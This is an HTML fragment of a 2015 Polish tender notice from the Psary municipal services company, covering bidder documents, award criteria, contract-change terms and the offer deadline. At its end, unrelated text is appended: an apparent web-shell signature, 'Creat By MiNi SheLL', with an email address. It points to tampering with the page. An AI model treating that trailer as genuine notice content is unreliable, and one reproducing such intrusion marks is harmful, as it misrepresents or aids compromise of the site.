<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - okres gwarancyjny - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z następującymi warunkami:
   1) zmiana (przedłużenie ) terminu realizacji zamówienia (umowy):
   -   w przypadku przedłużających się warunków zimowych, które wymagają zmiany wyznaczonego    
       okresu zimowego utrzymania;
   2) zmiana wynagrodzenia Wykonawcy (ceny podanej w ofercie):
   -   urzędowej zmiany stawki podatku VAT;
   3) zmiana podwykonawcy występującego po stronie Wykonawcy:
   -  w przypadku podejrzenia, że kwalifikacje podwykonawcy lub jego wyposażenie w sprzęt  nie  
       gwarantują odpowiedniej jakości wykonania usług lub  dotrzymania terminów.
   4) zmiana danych osobowych lub adresowych Wykonawcy,
   5)zmiana przedstawiciela stron umowy, osób nadzorujących ze strony Zamawiającego i  Wykonawcy.
4. Zmiany umowy każdorazowo wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.psary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej w Psarach
42-504 Będzin  Dąbie, ul. Dolna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 10:00, miejsce: Zakład Gospodarki Komunalnej w Psarach
42-504 Będzin  Dąbie, ul. Dolna 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com